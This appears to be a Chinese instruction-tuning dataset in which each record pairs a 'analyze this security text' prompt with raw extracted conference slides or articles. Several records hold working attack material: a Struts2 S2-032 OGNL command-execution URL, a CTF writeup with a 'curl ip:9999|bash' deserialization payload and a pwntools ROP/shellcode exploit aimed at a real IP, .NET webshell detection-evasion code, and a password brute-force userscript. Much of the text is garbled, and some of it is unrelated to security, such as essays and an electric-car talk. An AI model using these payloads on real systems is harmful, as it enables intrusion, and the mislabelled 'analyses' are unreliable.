{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n议题 WebLogic XMLDecoder 反序 列化之殇 演 讲人 谢 小强 ID Badcode 部 门/职 位 404实验室/安全研究员 研究方向 Web 安全 标签  Java Blog https://badcode.cc/ 帅 什么是 XMLDecoder  01 02 03 XMLDecoder 解析 流 程 XMLDecoder 反序 列化安全风 险 04 WebLogic 中的 XMLDecoder 漏 洞 01 什么是 XMLDecoder  XMLEncoder  是 ObjectOutputStream 的互补替换  将 Java 对象转换成 XML Test.xml void标签通过method属性调用方法 常用标签  基本类型标签  <boolean>  <byte>  <char>  <short>  <int>  <long>  <float>  <double>  <array>标签来定义一个数组  <object>标签表示从序列化形式重建对象所需的一组方法调用  <class>标记来表示Class的一个实例   XMLDecoder  用于读取使用 XMLEncoder 创建的 XML 文档  从 XML 文件中恢复 Java 对象 Java 对象 XML 文档 XMLDecoder XMLEncoder 02 XMLDecoder 解析 流 程 解析流程(JDK 6) startElement endElement MutableExpression 解析开始标签 生成MutableExpression对象 (value的初始值为unbound) setTarget setMethodName setProperty setValue addArg 解析结束标签 getValue Statement.invoke() -> Statement.invokeInternal() 反射调用 getTarget getMethodName MutableExpression 对象属性中的target和methodName 指定反射调 用的类和方法 com.sun.beans.ObjectHandler JDK 7+ com.sun.beans.decoder. DocumentHandler 解析流程(JDK 7+) 支持的标签  基本类型(int/char/byte)  java  string  null  array  object  void  class JDK 6 JDK 7+  基本类型(int/char/byte)  java  string  null  array  object  void  class  new  var  true  false  field  method  property 03 XMLDecoder 反序 列化安全风 险  Resting on Your Laurels will get you Pwned: Effectively Code Reviewing REST Applications to avoid getting powned By Abraham Kang, Dinis Cruz, and Alvaro Munoz 2013/8 Process Builder - Start a Calc.xml Java Unmarshaller Security By Moritz Bechler 2017/5 04 WebLogic 中的 XMLDecoder 漏 洞  CVE-2017-3506  CVE-2017-10271/CVE-2017-10352  CVE-2019-2725  CVE-2019-2729 CVE-2017-3506  2017年4月发布补丁修复  wls-wsat.war  Web Services  基于 http 协议  挖坑主力 触发流程 WLSServletAdapter.handle() WorkContextServerTube.processRequest() WorkContextTube.readHeaderOld() WorkContextXmlInputAdapter.readUTF() XMLDecoder.readObject() new java.lang.ProcessBuilder(\"calc\").start(); 补丁 2017年04月补丁 p25388747_1036_Generic 在 WorkContextXmlInputAdapter 类 中 增加 validate 方法验证将传入 XMLDecoder 中的数据 过滤 object 标签 CVE-2017-1027", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmodprobe === 自动处理可载入模块 ## 补充说明 **modprobe命令** 用于智能地向内核中加载模块或者从内核中移除模块 modprobe可载入指定的个别模块或是载入一组相依的模块modprobe会根据depmod所产生的相依关系决定要载入哪些模块若在载入过程中发生错误在modprobe会卸载整组的模块 ### 语法 ```shell modprobe(选项)(参数) ``` ### 选项 ```shell -a或--all载入全部的模块 -c或--show-conf显示所有模块的设置信息 -d或--debug使用排错模式 -l或--list显示可用的模块 -r或--remove模块闲置不用时即自动卸载模块 -t或--type指定模块类型 -v或--verbose执行时显示详细的信息 -V或--version显示版本信息 -help显示帮助 ``` ### 参数 模块名要加载或移除的模块名称 ### 实例 **查看modules的配置文件** ```shell modprobe -c ``` 这里可以查看modules的配置文件比如模块的alias别名是什么等会打印许多行信息例如其中的一行会类似如下 ```shell alias symbol:ip_conntrack_unregister_notifier ip_conntrack ``` **列出内核中所有已经或者未挂载的所有模块** ```shell modprobe -l ``` 这里我们能查看到我们所需要的模块然后根据我们的需要来挂载其实`modprobe -l`读取的模块列表就位于/lib/modules/\\`uname -r \\`目录中其中`uname -r`是内核的版本例如输出结果的其中一行是 ```shell /lib/modules/2.6.18-348.6.1.el5/kernel/net/netfilter/xt_statistic.ko ``` **挂载vfat模块** ```shell modprobe vfat ``` 这里使用格式`modprobe 模块名`来挂载一个模块挂载之后用lsmod可以查看已经挂载的模块模块名是不能带有后缀的我们通过`modprobe -l`所看到的模块都是带有`.ko`或`.o`后缀 **移除已经加载的模块** ```shell modprobe -r 模块名 ``` 这里移除已加载的模块和rmmod功能相同", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStory time! Supply Acquisition Circuit Interrupts around the house  Purposes GFCI: Intends to prevent Electric Shock AFCI: Intends to prevent fires Ground Fault CI Arc Fault CI Code Requirements GFCIs  Bathrooms/Indoor wet locations  Garages/storage areas/non habitable areas/unfinished basements  Outdoors/Compartments accessible from outside the unit/Rooftops/Pools/Hot tubs  Crawl spaces at or below grade level  Kitchen [dish washer, Refrigerator]  Laundry Areas AFCIs  Kitchens  Family Rooms  Dining Rooms  Living Rooms  Parlors  Libraries  Dens  Bed rooms  Sun rooms  Recreation Rooms  Closets/Hallways  Laundry Areas  Or similar rooms Demos Relevance  RFI can be accidental or intentional  RFI is wireless and fingerprint free  Annoying DoS/Neighbor trolling  Public Facilities  Devices that matter Suggested Solutions  Update to newer Circuit Breaker Patents  Uninterrupted power supply alternatives (Batteries, Back up Power Generators) Acknowledgements  Larry Averitt  Michael Demeter  Rafael Jauregui  Habteab Yemane  Michael Reams  Chris Mitchell  Laplinker  Thanks", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPLAYBACK: A TLS 1.3 STORY WHO ARE WE? Alfonso García Alguacil Alejo Murillo Moya INTRODUCING TLS 1.3 The Good  KISS  Only 5 ciphers supported INTRODUCING TLS 1.3 The Good  No vulnerable to the attacks impacting previous versions INTRODUCING TLS 1.3 The Good  Welcome Forward Secrecy INTRODUCING TLS 1.3 The Good  Formal security analysis performed to the protocol INTRODUCING TLS 1.3 The Bad  Protocol tainted due to compatibility issues  INTRODUCING TLS 1.3 The Ugly  0-RTT (this talk ) 0-RTT: SPEED AT A COST VS Your browsers  and CDNs may already be supporting TLS 1.3 0-RTT!  implementations  BoringSSL TLS 1.3 HANDSHAKE TLS 1.3 HANDSHAKE TLS 1.3 HANDSHAKE TLS 1.3 HANDSHAKE TLS 1.3 0-RTT TLS 1.3 0-RTT TLS 1.3 0-RTT As you can see it may be possible to do REPLAY REPLAY attacks! REPLAY REPLAY REPLAY TLS 1.3 0-RTT REPLAY TLS 1.3 0-RTT REPLAY TLS 1.3 0-RTT REPLAY TLS 1.3 0-RTT REPLAY TLS 1.3 0-RTT REPLAY ANTI-REPLAY PROTECTIONS Single-Use Tickets Single-Use Tickets ANTI-REPLAY PROTECTIONS Single-Use Tickets Single-Use Tickets Client-Hello Recording ANTI-REPLAY PROTECTIONS Single-Use Tickets Single-Use Tickets Client-Hello Recording Freshness checks ANTI-REPLAY PROTECTIONS Single-Use Tickets Single-Use Tickets Client-Hello Recording Freshness checks Application profiles ANTI-REPLAY PROTECTIONS Application profiles Single-Use Tickets Single-Use Tickets Client-Hello Recording Freshness checks Separate API ANTI-REPLAY PROTECTIONS (JUL-2018) Single-Use Tickets 0-RTT without protections Single-Use Tickets Client-Hello Recording Application Profile 0-RTT not available Different API for handling 0-RTT Other protections 0-RTT only on safe methods 0-RTT only on safe methods, no params BoringSSL Partial (HTTP Header) n/a n/a n/a n/a n/a n/a ANATOMY OF AN ATTACK  Vantage point in the network ANATOMY OF AN ATTACK  Browser and server with TLS 1.3 and 0-RTT enabled ANATOMY OF AN ATTACK  GET not being a safe method (a.k.a. RFC meets reality) THE BROWSER BEHAVIOUR  The browser decides when ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDIY Electric Car Dave Brown DC forums: RegEdit Voltswagon@live.com Background  8 years IT  3 years IT Security  12 years Electronics & more  FIRST Robotics  Solar Power Station  Solar Water Heater  Rain Barrels  Bike Generator  Murphy Bed  Workbench  Voltswagon Road Map  EV History  EV Acronyms  EV Pros & Cons  EV Uses  EV Parts & Layout  Open Source EV Hardware & Software  EV Conversion Tools  EV Conversion Steps Car Wars (1835 - 1920)  EVs predate ICE autos by 50 years  1989  EV is first to break 100 km/h (60 mph) barrier  EVs outsold ICE autos 10 to 1 The ICE Strikes Back (1910 - 2012)  Cheap oil  Electricity still limited and expensive  Growing rural population  1914 - Ford chooses gas- powered autos for motorized assembly line  1930 - Electric tram networks bought out and dismantled by GM and Big Oil Return of the EV (1970 - 2012)  1970s  Air pollution concerns and OPEC embargo  1990 - 2003  California Air Resources Board (CARB) mandates  2008  Tesla  2010  Nissan Leaf  2011  iMiEV EV Acronyms  A  Amps  AH  Amp Hours  V  Volts  w  Watts  wH  Watt Hours  wH/m  wH per mile  MPGe  Miles per Gallon equivalent  BEV  Battery Electric Vehicle  NEV  Neighborhood EV  PHEV  Plug-in Hybrid EV  E-REV  Extended Range EV  R-EEV  Range Extended EV EV Pros  Less Complexity  Less Maintenance  Efficiency  Longevity  Sustainability  Energy Independence  National Security  Environmental EV Cons  Batteries  Upfront costs  Lower energy density  Weight  Range  Charging Stations  Availability  Charge time Misconceptions  The grid cant take it  Same pollution, moved to the plant  More resources/pollution  Lithium is scarce  EVs are slow EV Uses  NEV  Business  Racing  Commuting NEV  Golf Carts  Security/Maintenance  Grocery Getter  Inexpensive  Reduced regulations Business  High mileage yields quick ROI  Predictable routes  Low maintenance Racing  Peak torque from 0 RPM  Wider power band requires less shifting Commuting  ~80% of US commutes are under 40 miles  No energy wasted sitting ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# S2-032 远程代码执行漏洞CVE-2016-3081 影响版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) 漏洞详情: - https://cwiki.apache.org/confluence/display/WW/S2-032 - https://www.cnblogs.com/mrchang/p/6501428.html ## 漏洞环境 执行如下命令启动struts2 2.3.28 ``` docker compose up -d ``` 环境启动后访问`http://your-ip:8080`即可看到默认页面 ## 漏洞复现 Struts2在开启了动态方法调用Dynamic Method Invocation的情况下可以使用`method:<name>`的方式来调用名字是`<name>`的方法而这个方法名将会进行OGNL表达式计算导致远程命令执行漏洞 直接请求如下URL即可执行`id`命令 ``` http://your-ip:8080/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id ``` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2 3 4 5 6        7 Where do the apps store data? Is data cached in multiple places? Is data encrypted on the device? Is the message recoverable ? Is supporting evidence present? 8 9 10 11 12 iTunes / API Can Access 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27        28 29 30 31 32 33 34 35             36               37      38           39              40 41 42           43              44             45 46 47         48", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMarch 23 2004 Coming of Age The number isnt important, friends have been saying when I talk about turning sixty. Some say, age is only a state of mind. Some say, youre as young as you feel. Some say, age doesnt matter. And some say, why, you look great! which unfortunately confirms that there really are three stages of life: youth, middle-age, and you look great! Well, my well-intended friends, I am here to tell you that age does matter. In some ways, it matters a LOT. When older people and younger people talk, they look at each other differently. Younger people have a shorter gaze. I was taught the meaning of a long gaze by a high school teacher, Miss McCutcheon, who gave me her long teachers gaze during an English class. I felt like a butterfly, pinned and wriggling. When another student asked what she was seeing, she said simply, Some day someone is really going to love that boy. I couldnt handle that. I was fifteen, fat and self-conscious and confused, and I squirmed, turned red and snapped something back ... but have never forgotten what she said. At a time when love seemed beyond my reach, her insight was deeper than mine, living as I did half-blind and half- crazy in an adolescent storm of rain hail and thunder. Coming up to sixty, we see other people, especially younger ones, more often with that long look. We see who they are and who they can become if they only attend to the better angels of their natures. Sometimes there are moments during such conversations when it feels as if the years fall away and transparencies of other conversations, ones that happened years ago, meld with the one I am having now. Memories control the present moment, capturing it with a force field of longing and grief before the experience becomes transparent to its underlying dynamics, the irrevocability of my own past juxtaposed with seemingly innumerable futures for the one to whom I am speaking, branching like blossoms of forbidden opportunity. Then the regret fades, replaced b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMake JDBC Attack Brilliant Again Chen Hongkun(@Litch1) | Xu Yuanzhen(@pyn3rd) TRACK 2 Your Designation, Company Name Here 1.The derivation of JDBC attacking 2.In-depth analysis of occurred implementations 3.Set fire on JDBC of diverse applications Agenda 1.The derivation of JDBC attacking 2.In-depth analysis of occurred implementations 3.Set fire on JDBC of diverse applications Agenda Java Database Connectivity What is the JDBC? JDBCMysqlImpl MySQL JDBC JDBCOracleImpl JDBCSQLServerIm pl JDBCDB2mpl Oracle MsSQL DB2 JDBC Driver Standard Interface Callback Java Application Not Recommended Unportable Callback set evil JDBC URL establish JDBC connection execute payload with JDBC driver Controllable JDBC URL Class.forName(\" com.mysql.cj.jdbc.Driver\"); String url = \"jdbc:mysql://localhost:3306/hitb\" Connection conn = DriverManager.getConnection(url) 1.The derivation of JDBC attacking 2.In-depth analysis of occurred implementations 3.Set fire on JDBC of diverse applications Agenda Agenda MySQL Client Arbitrary File Reading Vulnerability  Affect many clients including JDBC driver  LOAD DATA LOCAL INFILE statement establish JDBC connection greeting packet query packet file transfer packet Server Client MySQL JDBC Client Deserialization Vulnerability establish JDBC connection read evil object from server deserialize evil object  Affected MySQL JDBC driver need to support specific properties  gadgets are necessary Server Client MySQL Connector/J  CVE-2017-3523 MySQL Connector/J offers features to support for automatic serialization and deserialization of Java objects, to make it easy to store arbitrary objects in the database The flag \"useServerPrepStmts\" is set true to make MySQL Connector/J use server-side prepared statements The application is reading from a column having type BLOB, or the similar TINYBLOB, MEDIUMBLOB or LONGBLOB The application is reading from this column using .getObject() or one of the functions reading numeric values (which are first read as strings and ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 threat protection | compliance | archiving & governance | secure communication Malware Command and Control Channels - a journey into Darkness - By Brad Woodberg - Emerging Threats Product Manager / Proofpoint - @bradmatic517 - bradmatic@gmail.com 2 Agenda C2 Intro and Background (7 mins) Modern C2 Techniques (6 mins) Case Studies (15 mins) Predictions for C2 (5 mins) Defense (10 mins) Wrap Up (2 mins) 3 Why Command & Control? Vulnerabilities, Exploits, and Malware grab the headlines and analyst focus While very interesting, it is also very noisy, many exploits fail, very FP prone. If you can effectively detect C2 activity, you have a high fidelity indicator that an asset is actually compromised. With C2, the tables are turned on attackers, they go on defense, and we go on offense. 4 Primary Breach Vectors Modern malware is delivered in one of two ways:  Executable Content: Binary executables, embedded executable content like macros typically through web or email channels on the network.  Exploit Driven: An exploit against a software vulnerability such as those against Flash, PDF, Java, Office Docs, Browsers, and other network enabled applications. Regardless of how modern malware compromises a system, it is rarely autonomous. Dridex CVE-2016-4117 Angler EK 5 Why malware needs C2? Initial malware execution may occur under non-ideal scenarios: Malware may land on a non-target asset Malware may not have sufficient privileges when it executes Malware may be delivered in pieces to evade detection / fit into buffers Malware may require payload before it is malicious (e.g. TinyLoader) Malware may require coordination with C2 for operating instructions before it takes action (e.g. Crypto Ransomware waiting to receive a key) Enter Command and Control 6 Escalation Complete malware breach by acquiring additional executables, payloads, and configurations.  May be as simple as a word doc downloading an EXE (e.g. Dridex),  Or as complex as a dropper downloading an entirely new ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTriton and Symbolic execution on GDB bananaappletw)@)DEF)CON)China) 2018/05/11) $whoami  Wei-Bo)Chen(@bananaappletw))  MS)major)in)CSE,)Chiao)Tung) University,)Hsinchu)  Organizations:)  Software)Quality)Laboratory)  Co-founder)of)NCTUCSC)  Bamboofox)member)  Specialize)in:)  symbolic)execution)  binary)exploitation)  Talks:)  HITCON)CMT)2015) HITCON)CMT)2017) Outline  Why)symbolic)execution?)  What)is)symbolic)execution?)  Triton)  SymGDB)  Conclusion)  Drawbacks)of)Triton)  Comparison)between)other)symbolic)execution)framework) Why symbolic execution? In the old days  Static)analysis)  Dynamic)analysis) Static analysis  objdump)  IDA)PRO) Dynamic analysis  GDB)  ltrace)  strace) My brain is going to explode Symbolic execution!!! What is symbolic execution? Symbolic execution  Symbolic)execution)is)a)means)of)analyzing)a)program)to)determine) what)inputs)cause)each)part)of)a)program)to)execute.)  System-level)  S2e(https://github.com/dslab-epfl/s2e))  User-level)  Angr(http://angr.io/))  Triton(https://triton.quarkslab.com/))  Code-based)  klee(http://klee.github.io/)) Symbolic execution Z\"==\"12\" fail()\" \"OK\"\" Triton  Website:)https://triton.quarkslab.com/)  A)dynamic)binary)analysis)framework)written)in)C++.)  developed)by)Jonathan)Salwan)  Python)bindings)  Triton)components:)  Symbolic)execution)engine)  Tracer)  AST)representations)  SMT)solver)Interface) Triton  Structure)  Symbolic)execution)engine)  Triton)Tracer)  AST)representations)  Static)single)assignment)form(SSA)form))  Symbolic)variables)  SMT)solver)Interface)  Example Structure Symbolic execution engine  The)symbolic)engine)maintains:)  a)table)of)symbolic)registers)states)  a)map)of)symbolic)memory)states)  a)global)set)of)all)symbolic)references) Step) Register) Instruction)Set)of)symbolic)expressions) init) eax)=)UNSET)None) ) 1) eax)=)φ1) mov)eax,)0){φ1=0}) 2) eax)=)φ2) inc)eax) {φ1=0,φ2=φ1+1}) 3) eax)=)φ3) add)eax,)5) {φ1=0,φ2=φ1+1,φ3=φ2+5}) Triton Tracer  Tracer)provides:)  Current)opcode)ex", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2005 Hex-Rays was founded 2015 ??? 2007 Hex-Rays Decompiler 1.0 2009 Hex-Rays IDA 5.5 2013 Hex-Rays IDA 6.4 2011 Hex-Rays IDA 6.1                x = int(input()) if x >= 10: if x < 100: print \"Two!\" else: print \"Lots!\" else: print \"One!\" x = int(input()) if x >= 10: if x < 100: print \"Two!\" else: print \"Lots!\" else: print \"One!\" State A Variables x = ??? Constraints ------ x = int(input()) if x >= 10: if x < 100: print \"Two!\" else: print \"Lots!\" else: print \"One!\" State A Variables x = ??? Constraints ------ State AA Variables x = ??? Constraints x < 10 State AB Variables x = ??? Constraints x >= 10 x = int(input()) if x >= 10: if x < 100: print \"Two!\" else: print \"Lots!\" else: print \"One!\" State AA Variables x = ??? Constraints x < 10 State AB Variables x = ??? Constraints x >= 10 x = int(input()) if x >= 10: if x < 100: print \"Two!\" else: print \"Lots!\" else: print \"One!\" State AA Variables x = ??? Constraints x < 10 State AB Variables x = ??? Constraints x >= 10 State ABA Variables x = ??? Constraints x >= 10 x < 100 State ABB Variables x = ??? Constraints x >= 10 x >= 100 x = int(input()) if x >= 10: if x < 100: print \"Two!\" else: print \"Lots!\" else: print \"One!\" State ABA Variables x = ??? Constraints x >= 10 x < 100 Concretized ABA Variables x = 99 Shellphish CRS", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n-Writeup Nu1L WEB idid=2333flag ssrf+sqli fuzzsecertdownload.phpssrf insertpayload: gitpayload: O:7:\"Record\":3:{s:4:\"file\";s:19:\" curl ip:9999|bash \";} $ad sqlmap flag .index.php.swn upload.php unzip.sh . zipgetshell pregpayload http://47.104.74.209:20005/index.php?pat=/test/e&rep=system('ls -la')&sub=jutst test id 1%009 linux 1.php/. getshellbackup../ YUN_WAF ...aliyunwaflike veneno' or 1 and password like 'xxxx' limit 1# YUN_WAF form-data YUN_WAF post.. curlechoshellflag Pwn pwn 12. 0x804b14c0x2223322 payloadflag HMI 2 alarmSIGALRMhandlerROP alarm libcDynELFleakenvp systemget shellmprotect+shellcode fmtstr_payload(12, {0x804b14c: 0x2223322}) flag{1hasdfw423fgv45432wgasv45443v120bjsdf} from pwn import * cnt = 0x88 + 4 #context(log_level='debug') elf = ELF('./stack') #p = process('./stack') p = remote('47.104.188.176', 30004) rop = ROP(elf) rop.alarm(0x1000) rop.write(1, elf.got['read'], 4) rop.gee() p.recvuntil('Init') p.sendline(cnt * 'A' + rop.chain()) p.recvuntil('*...........................................................\\n ') p.recvuntil('*...........................................................\\n ') p.recvuntil('*...........................................................\\n ') p.recvuntil('*...........................................................\\n ') read_addr = u32(p.recv(4)) print hex(read_addr) def leak(addr): rop = ROP(elf) rop.write(1, addr, 4) rop.gee() p.sendline(cnt * 'A' + rop.chain()) p.recvuntil('*...........................................................\\n ') data = p.recv(4) print '%x => %s' % (addr, data or '') return data d = DynELF(leak, elf = ELF('./stack')) mprotect_addr = d.lookup('mprotect', 'libc') print hex(mprotect_addr) shellcode = shellcraft.i386.linux.sh() rop = ROP(elf) rop.call(mprotect_addr, arguments=(0x8048000, 4096, 7,)) rop.gee() p.sendline(cnt * 'A' + rop.chain()) p.recvuntil('*...........................................................\\n ') rop = ROP(elf) mmap rop.read(0, 0x8048000, 1024) rop.call(0x8048000) p.sendline((", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nZeroDay: Roswell by Richard Thieme I used to think that death bed revelations were nonsense. I knew lots of guys who kept their vows to the last breath. Some even spread disinformation as they died under torture. Intelligence professionals have discipline that sticks, most of the time. I was sure that I did too. Then I got the diagnosis. Cancer, inoperable. All through the gut. Stomach, liver, the intestines. As if I couldnt guess. Luckily we manage pain well these days. I feel as much as I want to feel. The pain reminds me that my life is nearly over. I dont want to forget that. A morphine haze reduces the urgency I need to make myself tell the truth. If I find myself drifting into a fog, dreaming about something in my non-existent future, I ease up on the meds until I vomit, bent double and clutching my gut, then take pills until Im coherent again but can still remember that I only have a day or two left. I am writing to three of you (you each know why and do not need to know the identity of the others) and sending one copy to a writer who will know how to use this information. He is not one of the usual suspects, not a name you would know, certainly not one of the useful idiots we use to spread disinformation. (We have more reporters in our stable than stars in the sky. And they say that two sources validate a story!) I am giving it to a man who understands that fiction is the only way to tell the truth. I am also giving the story to a blogger, but just one. So real gold will be buried on the Net like the dwarf did in that fairy tale. (Thats an inside joke. Youll understand in a minute.) You remember the fairy tale, right? A guy forced a dwarf to tell him where gold was buried in a forest? But he didnt have a shovel? So he tied a scarf around the tree and went to get one after making the dwarf swear he wouldnt untie it? But while he was gone, the dwarf tied scarves around all of the trees? So one blog, at least, will have it right. My God but this pain is intense", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.NET WebShell 免杀系列Ⅱ之 Tricks 分享 Ivan1ee@dotNet 安全矩阵 [ dotNet 安全矩阵]  聚焦于微软.NET 安全技术关注基于.NET 衍生出的各种红蓝攻防对抗技术分享内容不限于 .NET 代码审计 最新的.NET 漏洞分析反序列化漏洞研究有趣的.NET 安全 Trick.NET 开源软件分享. NET 生态等热点话题愿你能在这里学 到实在的干货共同推动.NET 安全氛围卷起来 配套的[ dotNet 安全矩阵]知识星球优惠活动持续进行每天只需要 1 块钱不到就可以让自己从.NET 小白成为高手因为星球里的资料 和教程很少在市面上广泛传播价值完全划算还可以获得阿里蚂 蚁字节等大厂内推实习或社招岗位的机会欢迎对.NET 感兴趣的 小伙伴们加入我们一起做一件有情有意义的事 0x01 背景 .NET WebShell 绕过和免杀的方法系列第二季开始啦接上季走硬刚 Unicode 编码绕过的方式 Bypass 主流的 webshell 查杀工具之后本文介绍几种特殊的 免杀和绕过技巧有助于在实战中对抗 WAF 等安全产品希望能帮助到大 伙 0x02 技巧一符号 2.1 逐字标识符 @符号在.NET 字符中有着特殊的意义把@放在一个字符串前面表示后面是一个逐字 字符串@符号的这个特点使得在表示系统文件路径时很方便就可以不再需要转义符 使用@字符后无法在字符串中插入有效的换行符(\\n)或制表符(\\t)因为将被当成正常字符 串输出例如以下 Demo 另外还可以转义.NET 平台保留的关键词如 ClassNameSpaceint 等参考如下 Demo string filepath = \"C:\\\\Program Files\\\\wmplayer.exe\"; => C:\\Program Files\\wmplayer.exe string filepath = @\"C:\\Program Files\\wmplayer.exe\"; => C:\\Program Files\\wmplayer.exe string filename = @\"dotNet\\tFile\"; => dotNet\\tFile 既然@字符可以做这么多有趣的事咱们就研究下利用它绕过某些安全产品的防护规则 笔者在 Process 类完整的命名空间处每个点之间都加上@符如下 2.2 内联注释符 在.NET 项目中单个 aspx 页面里支持使用内联注释符 /**/ , 此符号只会注释掉两个*号之间 的内容利用此特点也可以在类完全限定名每个点之间加上内联注释如下 namespace @namespace { class @class { public static void @static(int @int) { if (@int > 0) { System.Console.WriteLine(\"Positive Integer\"); } else if (@int == 0) { System.Console.WriteLine(\"Zero\"); } else { System.Console.WriteLine(\"Negative Integer\"); } } } } <script runat=\"server\" language=\"c#\"> public void Page_load(){ @System.@Diagnostics.@Process.@Start(\"cmd.exe\",\"/c mstsc\"); } </script> <%@ Page Language=\"C#\" ResponseEncoding=\"utf-8\" trace=\"false\" validateRequest=\"false\" EnableViewStateMac=\"false\" EnableViewState=\"true\"%> <script runat=\"server\"> public void Page_load() {System/**/.Diagnostics./**/Process/**/.Start(\"cmd.exe\",\"/c calc\");} </script> 0x03 语言 3.1 托管语言 c# .NET WebForm 项目通常包含多个 ASPX 文件每个文件都是 C#语言编写服务端代码其 @Page 指令最常用的设置如以下代码所示[ Language ] 属性指明服务端所使用的托管 语言类型默认均为 Language=\"C#\" [ AutoEventWireup ] 属性可设置 Index.aspx 页面的事件是否自动绑定其值为布尔类 型[ CodeBehind ] 属性指定包含与页关联的类的已编译文件的名称这个属性不能在运 行时使用[ Inher", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbout Us  Li Yuxiang @Xbalien29 Security researcher, found several vulnerabilities in Android, Former ROIS CTF team member, speaker of HITB 2018 AMS.  Qian Wenxiang @leonwxqian Security Researcher, Top 100 of MSRC list ( 2016 & 2017 ), Author of \"WhiteHat to talk about web browser security \".  Wu Huiyu @DroidSec_cn Security Researcher, Bug Hunter, GeekPwn 2015 Winner, Speaker of HITB 2018 AMS and POC 2017. Acknowledgement @Gmxp, Team Leader of Tencent Blade Team. @Lake2, Founder of Tencent Security Response Center. Tencent Blade Team  Founded By Tencent Security Platform Department.  Focus on security research of AI, IoT, Mobile devices.  Found 70+ security vulnerabilities (Google, Apple).  Contact us: https://blade.tencent.com Agenda  Introduction to Smart Speaker  Attack Surface  Remote Attack Xiaomi AI speaker  Breaking Amazon Echo  Conclusion Introduction to Smart Speaker About Amazon Echo About Xiaomi AI Speaker Attack Surface Smart Speaker Mobile App Cloud Server Communication Protocol Remote Attack Xiaomi AI Speaker  A Brief Look At Xiaomi AI Speaker  MIIO Ubus Command Execution  Messageagent Command Execution  Remote Exploit  Demo A Brief Look At Xiaomi AI Speaker  Base on OpenWrt 15.05.1  SSH Disabled  Firmware Verification based on RSA  Ports:  UDP 54321 MIIO  TCP 9999 UPNP  UDP 53 DNS MIIO Protocol MIIO Ubus Command Execution  Get MIIO protocol AES secret key (token) - Use a unauthorized unbind vulnerability to remote reset MI AI speaker - Bind MI AI Speaker to attackers account, extract token from MI Home Apps database (/data/data/com.xiaomi.smarthome/databases/miio2.db) MIIO Ubus Command Execution  Disable dropbear password auth  Start dropbear to open ssh  Connect Speaker in LAN MIIO Ubus Command Execution Messageagent Messageagent Command Execution  Parser and execute ubus command  Parser and execute system command Remote Exploit Demo Breaking Amazon Echo  A Brief Look At Amazon Echo  Soldering & Desoldering Tools  Flash Dump  Root Amazon Echo by Modi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 0x01 0x02js 0x03 chromeoverride // ==UserScript== // @name hexo // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author You // @match http://127.0.0.1:8000/* // @grant none //@run-at document-end // ==/UserScript== (function() { 'use strict'; // var uploadfile = document.createElement('input'); uploadfile.type=\"file\"; uploadfile.id=\"file_id\"; //readFile uploadfile.onchange= readFile; document.body.appendChild(uploadfile); //uikeydown var event = document.createEvent('UIEvents'); event.initUIEvent(\"keydown\",false,true,null); event.keyCode=13; var passwords = \"\"; var i =0; function readFile() { // const objFile = document.getElementById('file_id'); if(objFile.value === '') { alert(''); return; } // const files = objFile.files; // FileReader const reader = new FileReader(); // reader.readAsText(files[0], \"UTF-8\"); // reader.onload = function(e){ // const fileString = e.target.result; // const fileString2 = e.target.result.split('\\n'); // console.log(fileString2); passwords = fileString2; //timeout setTimeout(function(){ tampermonkey 0x04 if(passwords!=\"\"){ //intervalinterval var inter = setInterval(function(){ //debugdebug console.debug(passwords[i]); //keydown document.getElementById(\"hbePass\").value=passwords [i]; document.getElementById('hexo-blog-encrypt').dispatchEvent(event); setTimeout(function(){ if(i<passwords.length){ i++; } },20); //passwordsipasswords if(i==passwords.length){ //interval clearInterval(inter); } },5); } },500); }; } // Your code here... })(); 0x05", "category": "text_analysis", "source": "security_papers"}
